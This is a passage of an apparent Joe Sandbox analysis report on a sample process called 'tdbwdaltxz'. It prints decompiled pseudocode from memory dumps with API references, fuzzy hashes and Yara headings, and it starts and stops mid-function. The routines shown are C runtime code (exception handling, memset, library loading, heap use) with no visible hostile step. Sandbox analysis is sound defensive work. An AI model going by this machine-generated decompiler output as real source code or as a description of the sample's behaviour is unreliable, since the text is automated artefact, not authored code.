                        											_t301 = _v16;
                        											_t353 =  *_t301 - _t315;
                        											if( *_t301 <= _t315) {
                        												L62:
                        												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
                        											} else {
                        												while(1) {
                        													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                        													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
                        														goto L63;
                        													}
                        													_t315 = _t315 + 0x10;
                        													_t269 = _v20 + 1;
                        													_v20 = _t269;
                        													_t353 = _t269 -  *_t301;
                        													if(_t269 >=  *_t301) {
                        														goto L62;
                        													} else {
                        														continue;
                        													}
                        													goto L63;
                        												}
                        											}
                        											L63:
                        											_push(1);
                        											_push(_t270);
                        											E0040263C(_t270, _t301, _t315, __eflags);
                        											_t275 =  &_v64;
                        											E00403F71( &_v64);
                        											E0040225B( &_v64, 0x413554);
                        											L64:
                        											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                        											_t231 = E004029B3(_t270, _t275, _t296, _t315);
                        											_t275 = _v8;
                        											 *(_t231 + 0x14) = _v8;
                        											__eflags = _t315;
                        											if(_t315 == 0) {
                        												_t315 = _a8;
                        											}
                        											E00402F57(_t275, _t315, _t270);
                        											E0040426A(_a8, _a16, _t301);
                        											_t234 = E00404427(_t301);
                        											_t332 = _t332 + 0x10;
                        											_push(_t234);
                        											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
                        											goto L67;
                        										}
                        									}
                        								}
                        							}
                        						}
                        					}
                        				}
                        			}

                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                        • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                        • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                        • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                        • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                        • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                        • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				signed char _v36;
                        				void* _v40;
                        				signed int _t77;
                        				signed int _t84;
                        				intOrPtr _t85;
                        				void* _t86;
                        				intOrPtr* _t87;
                        				intOrPtr _t89;
                        				signed int _t91;
                        				int _t93;
                        				signed int _t98;
                        				intOrPtr* _t102;
                        				intOrPtr _t103;
                        				signed int _t107;
                        				char _t109;
                        				signed int _t113;
                        				void* _t114;
                        				intOrPtr _t123;
                        				void* _t125;
                        				intOrPtr _t133;
                        				signed int _t135;
                        				void* _t139;
                        				void* _t141;
                        				void* _t149;
                        
                        				_t118 = __edx;
                        				_t102 = _a4;
                        				_push(__edi);
                        				_v5 = 0;
                        				_v16 = 1;
                        				 *_t102 = E0040D360(__ecx,  *_t102);
                        				_t103 = _a8;
                        				_t6 = _t103 + 0x10; // 0x11
                        				_t133 = _t6;
                        				_push(_t133);
                        				_v20 = _t133;
                        				_v12 =  *(_t103 + 8) ^  *0x415010;
                        				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
                        				E00402967(_a12);
                        				_t77 = _a4;
                        				_t141 = _t139 - 0x1c + 0x10;
                        				_t123 =  *((intOrPtr*)(_t103 + 0xc));
                        				if(( *(_t77 + 4) & 0x00000066) != 0) {
                        					__eflags = _t123 - 0xfffffffe;
                        					if(_t123 != 0xfffffffe) {
                        						_t118 = 0xfffffffe;
                        						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
                        						goto L13;
                        					}
                        					goto L14;
                        				} else {
                        					_v32 = _t77;
                        					_v28 = _a12;
                        					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
                        					if(_t123 == 0xfffffffe) {
                        						L14:
                        						return _v16;
                        					} else {
                        						do {
                        							_t107 = _v12;
                        							_t84 = _t123 + (_t123 + 2) * 2;
                        							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
                        							_t85 = _t107 + _t84 * 4;
                        							_t108 =  *((intOrPtr*)(_t85 + 4));
                        							_v24 = _t85;
                        							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                        								_t109 = _v5;
                        								goto L7;
                        							} else {
                        								_t118 = _t133;
                        								_t86 = E004028F0(_t108, _t133);
                        								_t109 = 1;
                        								_v5 = 1;
                        								_t149 = _t86;
                        								if(_t149 < 0) {
                        									_v16 = 0;
                        									L13:
                        									_push(_t133);
                        									E004022D0(_t103, _t118, _t123, _t133, _v12);
                        									goto L14;
                        								} else {
                        									if(_t149 > 0) {
                        										_t87 = _a4;
                        										__eflags =  *_t87 - 0xe06d7363;
                        										if( *_t87 == 0xe06d7363) {
                        											__eflags =  *0x40e1c4;
                        											if(__eflags != 0) {
                        												_t98 = E0040D1F0(__eflags, "<&@");
                        												_t141 = _t141 + 4;
                        												__eflags = _t98;
                        												if(_t98 != 0) {
                        													_t135 =  *0x40e1c4; // 0x40263c
                        													 *0x40e160(_a4, 1);
                        													 *_t135();
                        													_t133 = _v20;
                        													_t141 = _t141 + 8;
                        												}
                        												_t87 = _a4;
                        											}
                        										}
                        										_t119 = _t87;
                        										E00402930(_t87, _a8, _t87);
                        										_t89 = _a8;
                        										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
                        										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
                        											_t119 = _t123;
                        											E00402950(_t89, _t123, _t133, 0x415010);
                        											_t89 = _a8;
                        										}
                        										_push(_t133);
                        										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
                        										E004022D0(_t103, _t119, _t123, _t133, _v12);
                        										E00402910();
                        										asm("int3");
                        										asm("int3");
                        										asm("int3");
                        										_t113 = _v32;
                        										_t91 = _v36 & 0x000000ff;
                        										_t125 = _v40;
                        										__eflags = _t113;
                        										if(_t113 == 0) {
                        											L46:
                        											return _v40;
                        										} else {
                        											_t93 = _t91 * 0x1010101;
                        											__eflags = _t113 - 0x20;
                        											if(_t113 <= 0x20) {
                        												L39:
                        												__eflags = _t113 & 0x00000003;
                        												while((_t113 & 0x00000003) != 0) {
                        													 *_t125 = _t93;
                        													_t125 = _t125 + 1;
                        													_t113 = _t113 - 1;
                        													__eflags = _t113 & 0x00000003;
                        												}
                        												__eflags = _t113 & 0x00000004;
                        												if((_t113 & 0x00000004) != 0) {
                        													 *_t125 = _t93;
                        													_t125 = _t125 + 4;
                        													_t113 = _t113 - 4;
                        													__eflags = _t113;
                        												}
                        												__eflags = _t113 & 0xfffffff8;
                        												while((_t113 & 0xfffffff8) != 0) {
                        													 *_t125 = _t93;
                        													 *(_t125 + 4) = _t93;
                        													_t125 = _t125 + 8;
                        													_t113 = _t113 - 8;
                        													__eflags = _t113 & 0xfffffff8;
                        												}
                        												goto L46;
                        											} else {
                        												__eflags = _t113 - 0x80;
                        												if(__eflags < 0) {
                        													L33:
                        													asm("bt dword [0x415030], 0x1");
                        													if(__eflags >= 0) {
                        														goto L39;
                        													} else {
                        														asm("movd xmm0, eax");
                        														asm("pshufd xmm0, xmm0, 0x0");
                        														goto L35;
                        													}
                        												} else {
                        													asm("bt dword [0x415c68], 0x1");
                        													if(__eflags >= 0) {
                        														asm("bt dword [0x415030], 0x1");
                        														if(__eflags >= 0) {
                        															goto L39;
                        														} else {
                        															asm("movd xmm0, eax");
                        															asm("pshufd xmm0, xmm0, 0x0");
                        															_t114 = _t125 + _t113;
                        															asm("movups [edi], xmm0");
                        															_t125 = _t125 + 0x00000010 & 0xfffffff0;
                        															_t113 = _t114 - _t125;
                        															__eflags = _t113 - 0x80;
                        															if(__eflags <= 0) {
                        																goto L33;
                        															} else {
                        																do {
                        																	asm("movdqa [edi], xmm0");
                        																	asm("movdqa [edi+0x10], xmm0");
                        																	asm("movdqa [edi+0x20], xmm0");
                        																	asm("movdqa [edi+0x30], xmm0");
                        																	asm("movdqa [edi+0x40], xmm0");
                        																	asm("movdqa [edi+0x50], xmm0");
                        																	asm("movdqa [edi+0x60], xmm0");
                        																	asm("movdqa [edi+0x70], xmm0");
                        																	_t125 = _t125 + 0x80;
                        																	_t113 = _t113 - 0x80;
                        																	__eflags = _t113 & 0xffffff00;
                        																} while ((_t113 & 0xffffff00) != 0);
                        																L35:
                        																__eflags = _t113 - 0x20;
                        																if(_t113 < 0x20) {
                        																	L38:
                        																	asm("movdqu [edi], xmm0");
                        																	asm("movdqu [edi+0x10], xmm0");
                        																	return _v40;
                        																} else {
                        																	do {
                        																		asm("movdqu [edi], xmm0");
                        																		asm("movdqu [edi+0x10], xmm0");
                        																		_t125 = _t125 + 0x20;
                        																		_t113 = _t113 - 0x20;
                        																		__eflags = _t113 - 0x20;
                        																	} while (_t113 >= 0x20);
                        																	__eflags = _t113 & 0x0000001f;
                        																	if((_t113 & 0x0000001f) == 0) {
                        																		goto L46;
                        																	} else {
                        																		goto L38;
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														memset(_t125, _t93, _t113 << 0);
                        														return _v40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										goto L7;
                        									}
                        								}
                        							}
                        							goto L47;
                        							L7:
                        							_t123 = _t103;
                        						} while (_t103 != 0xfffffffe);
                        						if(_t109 != 0) {
                        							goto L13;
                        						}
                        						goto L14;
                        					}
                        				}
                        				L47:
                        			}



































                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00402347
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                        • _ValidateLocalCookies.LIBCMT ref: 004023D8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                        • _ValidateLocalCookies.LIBCMT ref: 00402458
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: <&@$csm
                        • API String ID: 1170836740-4289465445
                        • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                        • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                        • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                        • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E01061490(WCHAR* _a4) {
                        				signed int _v8;
                        				void* _v12;
                        				int _t16;
                        				void* _t19;
                        				long _t21;
                        				signed int _t28;
                        				long _t36;
                        				void* _t37;
                        				void* _t39;
                        				void* _t45;
                        				WCHAR* _t47;
                        				void* _t48;
                        				long _t51;
                        				long _t52;
                        				void* _t53;
                        				short* _t54;
                        				long _t55;
                        				void* _t57;
                        				void* _t58;
                        
                        				_t36 = _a4;
                        				if(_t36 != 0) {
                        					_t39 = 1;
                        					_t51 = _t36;
                        					do {
                        						_t16 = lstrlenW(_t51 + 4);
                        						_t51 =  *_t51;
                        						_t39 = _t39 + 3 + _t16;
                        						__eflags = _t51;
                        					} while (_t51 != 0);
                        					_t19 = HeapAlloc(GetProcessHeap(), _t51, _t39 + _t39);
                        					_v12 = _t19;
                        					_t52 = _t19;
                        					do {
                        						_push(0x3d);
                        						_push(_t36 + 4);
                        						_t21 = E01062AA0(_t37);
                        						_t57 = _t57 + 8;
                        						_a4 = _t21;
                        						__eflags = _t21;
                        						if(_t21 != 0) {
                        							 *_t52 = 0x20;
                        							_t45 = (_t21 - _t36 - 4 >> 1) + (_t21 - _t36 - 4 >> 1);
                        							_t53 = _t52 + 2;
                        							E01063C60(_t53, _t36 + 4, _t45);
                        							_t54 = _t53 + _t45;
                        							_t47 =  &(_a4[1]);
                        							_push(0x20);
                        							 *_t54 = 0x3d;
                        							_push(_t47);
                        							_t55 = _t54 + 2;
                        							__eflags = _t55;
                        							_a4 = _t47;
                        							_t28 = E01062AA0(_t37);
                        							_t58 = _t57 + 0x14;
                        							asm("sbb eax, eax");
                        							_v8 =  ~( ~_t28);
                        							if(__eflags != 0) {
                        								 *_t55 = 0x22;
                        								_t55 = _t55 + 2;
                        								__eflags = _t55;
                        							}
                        							_t48 = lstrlenW(_t47) + _t31;
                        							E01063C60(_t55, _a4, _t48);
                        							_t57 = _t58 + 0xc;
                        							_t52 = _t55 + _t48;
                        							__eflags = _v8;
                        							if(_v8 != 0) {
                        								 *_t52 = 0x22;
                        								_t52 = _t52 + 2;
                        								__eflags = _t52;
                        							}
                        						}
                        						_t36 =  *_t36;
                        						__eflags = _t36;
                        					} while (_t36 != 0);
                        					__eflags = 0;
                        					 *_t52 = 0;
                        					return _v12;
                        				} else {
                        					return 0;
                        				}
                        			}























                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap_memmove_wcschrlstrlen$AllocProcess
                        • String ID:
                        • API String ID: 3798481777-0
                        • Opcode ID: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction ID: 24ac637c953df66061c31803499ca73fe0b039d984d21936afe607a96081f0be
                        • Opcode Fuzzy Hash: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction Fuzzy Hash: 6831E577D00206EBD7319F68DC84A9AB7FCAFA4350F15416AED89EB240E635D90187D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				void* _t20;
                        				void* _t22;
                        				WCHAR* _t26;
                        				signed int _t29;
                        				void** _t30;
                        				signed int* _t35;
                        				void* _t38;
                        				void* _t40;
                        
                        				_t35 = _a4;
                        				while(_t35 != _a8) {
                        					_t29 =  *_t35;
                        					_v8 = _t29;
                        					_t38 =  *(0x416300 + _t29 * 4);
                        					if(_t38 == 0) {
                        						_t26 =  *(0x40fa88 + _t29 * 4);
                        						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                        						if(_t38 != 0) {
                        							L14:
                        							_t30 = 0x416300 + _v8 * 4;
                        							 *_t30 = _t38;
                        							if( *_t30 != 0) {
                        								FreeLibrary(_t38);
                        							}
                        							L16:
                        							_t20 = _t38;
                        							L13:
                        							return _t20;
                        						}
                        						_t22 = GetLastError();
                        						if(_t22 != 0x57) {
                        							L9:
                        							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
                        							L10:
                        							_t35 =  &(_t35[1]);
                        							continue;
                        						}
                        						_t22 = E00405A18(_t26, L"api-ms-", 7);
                        						_t40 = _t40 + 0xc;
                        						if(_t22 == 0) {
                        							goto L9;
                        						}
                        						_t22 = E00405A18(_t26, L"ext-ms-", 7);
                        						_t40 = _t40 + 0xc;
                        						if(_t22 == 0) {
                        							goto L9;
                        						}
                        						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                        						_t38 = _t22;
                        						if(_t38 != 0) {
                        							goto L14;
                        						}
                        						goto L9;
                        					}
                        					if(_t38 != 0xffffffff) {
                        						goto L16;
                        					}
                        					goto L10;
                        				}
                        				_t20 = 0;
                        				goto L13;
                        			}













                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,CF17A32A,?,004083E2,00000002,00000000,00000000), ref: 00408394
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                        • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                        • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                        • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E010753D9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				intOrPtr* _t31;
                        				void* _t32;
                        
                        				_push(8);
                        				_push(0x107e500);
                        				_t11 = E010668F0(__ebx, __edi, __esi);
                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                        				if(_t31 != 0) {
                        					E01064D39(0xd);
                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                        					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10809a8) {
                        						E01064ED2( *(_t31 + 4));
                        					}
                        					 *(_t32 - 4) = 0xfffffffe;
                        					E010759E9();
                        					if( *_t31 != 0) {
                        						E01064D39(0xc);
                        						 *(_t32 - 4) = 1;
                        						E0107024B( *_t31);
                        						_t17 =  *_t31;
                        						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x1080d40) {
                        							E010700F1(_t17);
                        						}
                        						 *(_t32 - 4) = 0xfffffffe;
                        						E010759F5();
                        					}
                        					_t11 = E01064ED2(_t31);
                        				}
                        				return E01066935(_t11);
                        			}








                        APIs
                        • __lock.LIBCMT ref: 0107595D
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D,?,?,?,?,?,?,?,?,0107E188,00000008,0106B30F,00000000), ref: 01064D64
                        • InterlockedDecrement.KERNEL32(00000000), ref: 01075970
                        • _free.LIBCMT ref: 01075986
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EF8
                        • __lock.LIBCMT ref: 0107599F
                        • ___removelocaleref.LIBCMT ref: 010759AE
                        • ___freetlocinfo.LIBCMT ref: 010759C7
                        • _free.LIBCMT ref: 010759DA
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                        • String ID:
                        • API String ID: 556454624-0
                        • Opcode ID: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction ID: d23acd6f19b6c5fbd4e6a06fcf96036428ffa507910a50b814e5d6cf4224118c
                        • Opcode Fuzzy Hash: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction Fuzzy Hash: A6018031D01702EAEBB57F68DC057DD7AE46F12730F20469DF1D8AA0D0DB749580C619
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0106B3E0(void* __ebx, void* __edi) {
                        				void* __esi;
                        				void* _t3;
                        				intOrPtr _t6;
                        				long _t14;
                        				long* _t27;
                        
                        				E010653AC(_t3);
                        				if(E01064E88() != 0) {
                        					_t6 = E0106BBB1(_t5, E0106B140);
                        					 *0x1080670 = _t6;
                        					__eflags = _t6 - 0xffffffff;
                        					if(_t6 == 0xffffffff) {
                        						goto L1;
                        					} else {
                        						_t27 = E01064F0A(1, 0x3b8);
                        						__eflags = _t27;
                        						if(_t27 == 0) {
                        							L6:
                        							E0106B456();
                        							__eflags = 0;
                        							return 0;
                        						} else {
                        							__eflags = E0106BBDB(_t9,  *0x1080670, _t27);
                        							if(__eflags == 0) {
                        								goto L6;
                        							} else {
                        								_push(0);
                        								_push(_t27);
                        								E0106B334(__ebx, __edi, _t27, __eflags);
                        								_t14 = GetCurrentThreadId();
                        								_t27[1] = _t27[1] | 0xffffffff;
                        								 *_t27 = _t14;
                        								__eflags = 1;
                        								return 1;
                        							}
                        						}
                        					}
                        				} else {
                        					L1:
                        					E0106B456();
                        					return 0;
                        				}
                        			}









                        APIs
                        • __init_pointers.LIBCMT ref: 0106B3E0
                          • Part of subcall function 010653AC: EncodePointer.KERNEL32(00000000,?,0106B3E5,0106431E,0107DFD8,00000014), ref: 010653AF
                          • Part of subcall function 010653AC: __initp_misc_winsig.LIBCMT ref: 010653D0
                        • __mtinitlocks.LIBCMT ref: 0106B3E5
                          • Part of subcall function 01064E88: InitializeCriticalSectionAndSpinCount.KERNEL32(010803F8,00000FA0,?,?,0106B3EA,0106431E,0107DFD8,00000014), ref: 01064EA6
                        • __mtterm.LIBCMT ref: 0106B3EE
                        • __calloc_crt.LIBCMT ref: 0106B413
                        • __initptd.LIBCMT ref: 0106B435
                        • GetCurrentThreadId.KERNEL32 ref: 0106B43C
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2211675822-0
                        • Opcode ID: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction ID: 7789b4e8aa9c632ad8694f532c391716a801157ad41010afb9af6e60e1eb202e
                        • Opcode Fuzzy Hash: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction Fuzzy Hash: CAF090B27497239AE7B43B387C06ADA3ACCDF21635F204A5AF8D4D50C4EF6184428254
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061A90(void* __eflags, signed int _a4, long* _a8, long* _a12) {
                        				void* _t21;
                        				int _t22;
                        				void* _t26;
                        				signed int _t27;
                        				long _t29;
                        				signed int _t30;
                        				long* _t31;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				signed int _t40;
                        				void* _t42;
                        
                        				_t35 = _a4;
                        				 *_a8 = 0;
                        				 *_a12 = 0;
                        				_t21 = E01061640(_t35, 0);
                        				_t22 = lstrlenW(_t35);
                        				_t26 = HeapAlloc(GetProcessHeap(), 0, 2 + (_t22 + _t21) * 2);
                        				_t42 = _t26;
                        				if(_t42 == 0) {
                        					return _t26;
                        				} else {
                        					_t27 = E01061640(_t35, _t42);
                        					_a4 = _t27;
                        					_t29 = HeapAlloc(GetProcessHeap(), 0, 4 + _t27 * 4);
                        					_t36 = _t29;
                        					if(_t36 != 0) {
                        						_t30 = _a4;
                        						_t40 = 0;
                        						if(_t30 <= 0) {
                        							L6:
                        							 *(_t36 + _t40 * 4) = 0;
                        							 *_a8 = _t30;
                        							_t31 = _a12;
                        							 *_t31 = _t36;
                        							return _t31;
                        						}
                        						do {
                        							 *(_t36 + _t40 * 4) = _t42;
                        							_t32 = lstrlenW(_t42);
                        							_t30 = _a4;
                        							_t40 = _t40 + 1;
                        							_t42 = _t42 + _t32 * 2 + 2;
                        						} while (_t40 < _t30);
                        						goto L6;
                        					}
                        					return HeapFree(GetProcessHeap(), _t29, _t42);
                        				}
                        			}
















                        APIs
                        • lstrlenW.KERNEL32(?), ref: 01061AB6
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061ACE
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AD1
                        • GetProcessHeap.KERNEL32(00000000), ref: 01061AF1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AF4
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061B02
                        • HeapFree.KERNEL32(00000000), ref: 01061B05
                        • lstrlenW.KERNEL32(00000000), ref: 01061B24
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloclstrlen$Free
                        • String ID:
                        • API String ID: 1242203261-0
                        • Opcode ID: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction ID: c20c9f97517295658b83cd62faf7575040e2e70fe348ae006dd91f9ee83db3b5
                        • Opcode Fuzzy Hash: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction Fuzzy Hash: FB2151B6600219ABD7219F69EC88F9F7BACEF89350F014011FA45DB214D635E900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E01074BD2(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t45;
                        				signed int _t46;
                        				signed int _t47;
                        				signed int _t50;
                        				signed int _t53;
                        				signed int _t54;
                        				signed int _t59;
                        				void* _t64;
                        				signed int _t66;
                        				void* _t68;
                        				signed int _t75;
                        				signed int _t79;
                        				signed short _t80;
                        				signed int _t82;
                        				void* _t83;
                        				signed int _t90;
                        				void* _t91;
                        				signed int _t92;
                        				signed int _t94;
                        				signed int* _t97;
                        
                        				_t46 = E01066594(_t45);
                        				if(_t46 >= 0) {
                        					_t97 = _a8;
                        					_t47 = E01065573(_t97);
                        					_t79 = _t97[3];
                        					_t94 = _t47;
                        					__eflags = _t79 & 0x00000082;
                        					if(__eflags != 0) {
                        						__eflags = _t79 & 0x00000040;
                        						if(__eflags == 0) {
                        							_t75 = 0;
                        							__eflags = _t79 & 0x00000001;
                        							if((_t79 & 0x00000001) == 0) {
                        								L10:
                        								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                        								_t97[3] = _t50;
                        								_t97[1] = _t75;
                        								__eflags = _t50 & 0x0000010c;
                        								if((_t50 & 0x0000010c) == 0) {
                        									_t64 = E01062E24();
                        									__eflags = _t97 - _t64 + 0x20;
                        									if(_t97 == _t64 + 0x20) {
                        										L13:
